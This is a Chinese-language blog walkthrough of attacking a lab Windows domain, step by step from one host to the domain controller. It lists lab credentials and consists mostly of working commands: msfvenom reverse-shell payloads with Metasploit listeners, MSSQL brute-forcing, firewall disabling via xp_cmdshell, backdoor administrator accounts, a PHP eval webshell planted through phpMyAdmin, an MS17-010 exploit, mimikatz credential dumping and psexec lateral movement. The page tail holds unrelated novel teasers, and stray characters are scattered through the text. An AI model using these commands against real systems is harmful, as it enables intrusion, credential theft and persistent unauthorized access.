內(nèi)網(wǎng)滲透系列之域滲透深入彈shell開3389拿域控

僅作為實驗參考糯钙,不屬于任何技術(shù)文章

本文已首發(fā)于i春秋

實驗?zāi)康模耗孟乱惶枡C(jī)shell開3389遠(yuǎn)程登錄

拓?fù)鋱D

A組

1號
賬號:Administrator
密碼:Jack@!@#

ip:192.168.141.111

2號
賬號:ADMIN-PC/ADMIN
密碼:123456hhhh.

222.18.158.244:7771

ip:192.168.141.138

3號
域名:hiro.com

管理員
賬號:hiro\administrator
密碼:hb123456,./$

域用戶
賬號:hiro.com/user1
密碼:hb123456,./$

ip:192.168.141.100

Tips
里面設(shè)了靜態(tài)ip 要改一下
已將加入過程總結(jié)

4號
賬號:administrator
密碼:Win@2003

ip:192.168.141.114

5號
賬號:Administrator
密碼:Win@2008

ip:192.168.141.115

6號
賬號:Administrator
密碼:Edvison233!

ip:192.168.141.116

B組(攻擊組)

使用kali拿下二號機(jī)

通過MobaXterm連接Kali Linux(ip:192.168.141.143)享潜,用戶名:root澜术,密碼:toor


使用下述命令,執(zhí)行缩擂,生成木馬文件:

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 LHOST=192.168.141.143 LPORT=4444 -f exe > ./test.exe

生成了test.exe之后陨闹,然后在kali里,設(shè)定端口監(jiān)聽,等待目標(biāo)上線

msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp;show options; set LHOST 192.168.141.143;set LPORT 4444; run"

在2號機(jī)上右擊,以管理員權(quán)限執(zhí)行。kali就可以接收到反彈回來的shell。對shell進(jìn)行操作。

在kali里接收到了shell,可在meterpreter中管理shell扎筒,開啟3389


在kali里接收到了shell骨宠,可在meterpreter中管理shell立美,開啟3389

run post/windows/manage/enable_rdp

添加用戶

run post/windows/manage/enable_rdp username="Waldo1111test" password="123456hhhh."

然后在服務(wù)器主機(jī)中,用新添加的賬號,遠(yuǎn)程桌面連接2號機(jī),至此完成了對2號機(jī)的控制


2號機(jī)到6號機(jī)

使用nmap掃描發(fā)現(xiàn)192.168.141.116開了1433端口

nmap -p1433 --open 192.168.141.0/24

使用ms-sql-brute模塊對6號機(jī)sa賬戶進(jìn)行爆破,獲得用戶名為sa,密碼為123456

nmap -p 1433 --script ms-sql-brute --script-args userdb=C:\Users\Waldo1111test\Desktop\name.txt,passdb=C:\Users\Waldo1111test\Desktop\password.txt 192.168.141.116

使用sqltools獲取6號機(jī)數(shù)據(jù)庫


用xp_cmdshell關(guān)閉防火墻限制

netsh firewall set opmode mode=disable

添加3389入站規(guī)則

netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow

創(chuàng)建管理員用戶Waldo6TEST

net user Waldo6TEST 1234567hhhh. /add
net localgroup administrators Waldo6TEST /add

使用用戶名Wado6TEST 密碼1234567hhhh.成功登陸六號機(jī)


6號機(jī)到5號機(jī)

發(fā)現(xiàn)5號機(jī)開放80端口

輸入://192.168.141.115/phpmyadmin/嘱根,弱口令 用戶名root 密碼root

嘗試寫入webshell

use mysql;
CREATE TABLE `mysql`.`d0g3` (`sn00py` TEXT NOT NULL );
INSERT INTO `mysql`.`d0g3` (`sn00py`)VALUES ('<?php @eval($_POST[c]);?>');
SELECT sn00py FROM d0g3 INTO OUTFILE 'C:/pentest/phpstudy/WWW/shell.php';

Shell寫到了:http://192.168.141.115/shell.php

使用菜刀連接

執(zhí)行命令whoami,發(fā)現(xiàn)是administrator權(quán)限

image

加管理員用戶

net user Waldo 1234567hhhh. /add
net localgroup administrators Waldo /add

打開5號機(jī)3389端口:

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

連接到遠(yuǎn)程桌面

5號機(jī)到4號機(jī)

在5號機(jī)上傳ms17010攻擊腳本凑保,用kali攻擊機(jī)生成一個payload

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.141.143 lport=6666 -f exe -o shell.exe

開啟msf監(jiān)聽

msfconsole -q
use exploit/multi/handler
set lhost 0.0.0.0
set lport 6666
exploit

在5號機(jī)中cmd中C:\Users\Waldo\MS17-010-master

在5號機(jī)上冈爹,運行ms170101攻擊腳本(腳本要自己下載)

python zzz_exploit.py 192.168.141.114

在kali里接收到了shell,可在meterpreter中管理shell芝此,開啟3389

run post/windows/manage/enable_rdp

添加用戶

run post/windows/manage/enable_rdp username="Waldo1111test" password="123456hhhh."

在5號機(jī)遠(yuǎn)程登錄4號機(jī)


4號機(jī)到3號機(jī)

在4號機(jī)中抓取hash

privilege::debug
sekurlsa::logonpasswords

抓到域控管理員賬號和密碼:

在4號機(jī)上,使用以下命令建立IPC$連接

net use \\192.168.141.100 "hb123456,./$" /user:"Administrator"

在4號機(jī)上,使用以下命令碰凶,將目標(biāo)靶機(jī)的C盤映射到本地Z盤

net use z: \\192.168.141.100\c$

使用copy命令將先前生成的shell.exe拷貝至靶機(jī)C盤

copy shell.exe \\192.168.141.100\c$

在kali上開啟監(jiān)聽(6666端口),使用psesec.exe.啟動靶機(jī)上的shell.exe

psexec.exe \\192.168.141.100 -u administrator -p hb123456,./$ c:\\shell.exe

成功反彈shell上線:

在kali里接收到了shell胚迫,可在meterpreter中管理shell,開啟3389

run post/windows/manage/enable_rdp

添加用戶

run post/windows/manage/enable_rdp username="Waldo1111test" password="123456hhhh."

在4號機(jī)遠(yuǎn)程登錄3號機(jī)
用戶名:hiro\Administrator 密碼:hb123456,./$

3號機(jī)到1號機(jī)

在3號機(jī)上,使用以下命令建立IPC$連接

net use \\192.168.141.111 "hb123456,./$" /user:"Administrator"

在3號機(jī)上凳宙,使用以下命令饺汹,將目標(biāo)靶機(jī)的C盤映射到本地Z盤

net use z: \\192.168.141.111\c$

使用copy命令將先前生成的shell.exe拷貝至靶機(jī)C盤

copy shell.exe \\192.168.141.111\c$

在kali上開啟監(jiān)聽(6666端口),使用psexec.exe.啟動靶機(jī)上的shell.exe

psexec.exe \\192.168.141.111 -u hiro\Administrator -p hb123456,./$ c:\\shell.exe

成功獲取shell

打開一號機(jī)3389

使用用戶名:hiro\Administrator 密碼: hb123456,./$登錄

成功拿下一號機(jī)摆昧!

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末,一起剝皮案震驚了整個濱河市,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌蝗蛙,老刑警劉巖逼蒙,帶你破解...
    沈念sama閱讀 216,372評論 6 498
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件笙以,死亡現(xiàn)場離奇詭異逻炊,居然都是意外死亡佑淀,警方通過查閱死者的電腦和手機(jī),發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 92,368評論 3 392
  • 文/潘曉璐 我一進(jìn)店門,熙熙樓的掌柜王于貴愁眉苦臉地迎上來裁着,“玉大人棘捣,你說我怎么就攤上這事矩动∧烁辏” “怎么了?”我有些...
    開封第一講書人閱讀 162,415評論 0 353
  • 文/不壞的土叔 我叫張陵阀参,是天一觀的道長瀑罗。 經(jīng)常有香客問我摧玫,道長榜配,這世上最難降的妖魔是什么扼劈? 我笑而不...
    開封第一講書人閱讀 58,157評論 1 292
  • 正文 為了忘掉前任驻啤,我火速辦了婚禮,結(jié)果婚禮上荐吵,老公的妹妹穿的比我還像新娘骑冗。我一直安慰自己,他們只是感情好先煎,可當(dāng)我...
    茶點故事閱讀 67,171評論 6 388
  • 文/花漫 我一把揭開白布贼涩。 她就那樣靜靜地躺著,像睡著了一般薯蝎。 火紅的嫁衣襯著肌膚如雪遥倦。 梳的紋絲不亂的頭發(fā)上,一...
    開封第一講書人閱讀 51,125評論 1 297
  • 那天占锯,我揣著相機(jī)與錄音袒哥,去河邊找鬼。 笑死消略,一個胖子當(dāng)著我的面吹牛堡称,可吹牛的內(nèi)容都是我干的。 我是一名探鬼主播艺演,決...
    沈念sama閱讀 40,028評論 3 417
  • 文/蒼蘭香墨 我猛地睜開眼粮呢,長吁一口氣:“原來是場噩夢啊……” “哼!你這毒婦竟也來了钞艇?” 一聲冷哼從身側(cè)響起啄寡,我...
    開封第一講書人閱讀 38,887評論 0 274
  • 序言:老撾萬榮一對情侶失蹤,失蹤者是張志新(化名)和其女友劉穎哩照,沒想到半個月后挺物,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體,經(jīng)...
    沈念sama閱讀 45,310評論 1 310
  • 正文 獨居荒郊野嶺守林人離奇死亡飘弧,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 37,533評論 2 332
  • 正文 我和宋清朗相戀三年识藤,在試婚紗的時候發(fā)現(xiàn)自己被綠了砚著。 大學(xué)時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
    茶點故事閱讀 39,690評論 1 348
  • 序言:一個原本活蹦亂跳的男人離奇死亡痴昧,死狀恐怖稽穆,靈堂內(nèi)的尸體忽然破棺而出,到底是詐尸還是另有隱情赶撰,我是刑警寧澤舌镶,帶...
    沈念sama閱讀 35,411評論 5 343
  • 正文 年R本政府宣布,位于F島的核電站豪娜,受9級特大地震影響餐胀,放射性物質(zhì)發(fā)生泄漏。R本人自食惡果不足惜瘤载,卻給世界環(huán)境...
    茶點故事閱讀 41,004評論 3 325
  • 文/蒙蒙 一否灾、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧鸣奔,春花似錦墨技、人聲如沸。這莊子的主人今日做“春日...
    開封第一講書人閱讀 31,659評論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽。三九已至伟叛,卻和暖如春私痹,著一層夾襖步出監(jiān)牢的瞬間,已是汗流浹背统刮。 一陣腳步聲響...
    開封第一講書人閱讀 32,812評論 1 268
  • 我被黑心中介騙來泰國打工紊遵, 沒想到剛下飛機(jī)就差點兒被人妖公主榨干…… 1. 我叫王不留,地道東北人侥蒙。 一個月前我還...
    沈念sama閱讀 47,693評論 2 368
  • 正文 我出身青樓暗膜,卻偏偏與公主長得像,于是被迫代替她去往敵國和親鞭衩。 傳聞我的和親對象是個殘疾皇子学搜,可洞房花燭夜當(dāng)晚...
    茶點故事閱讀 44,577評論 2 353

推薦閱讀更多精彩內(nèi)容

  • win7 cmd管理員權(quán)限設(shè)置 net localgroup administrators 用戶名 /add 把“...
    f675b1a02698閱讀 5,187評論 0 11
  • 運行操作 CMD命令:開始->運行->鍵入cmd或command(在命令行里可以看到系統(tǒng)版本、文件系統(tǒng)版本) CM...
    小沐子_IT閱讀 2,115評論 0 4
  • 一论衍、命令行 1. calc-----------啟動計算器 2.certmgr.msc----證書管理實用程序 3...
    小小辛_c閱讀 703評論 0 2
  • 命令簡介 cmd是command的縮寫.即命令行 瑞佩。 雖然隨著計算機(jī)產(chǎn)業(yè)的發(fā)展,Windows 操作系統(tǒng)的應(yīng)用越來...
    Littleston閱讀 3,317評論 0 12
  • 本文已在i春秋論壇發(fā)表 本文涉及的知識點: CVE-2018-8174漏洞復(fù)現(xiàn)坯台、內(nèi)網(wǎng)滲透炬丸、權(quán)限維持、腳本編程蜒蕾、痕跡...
    Waldo_cuit閱讀 5,680評論 1 1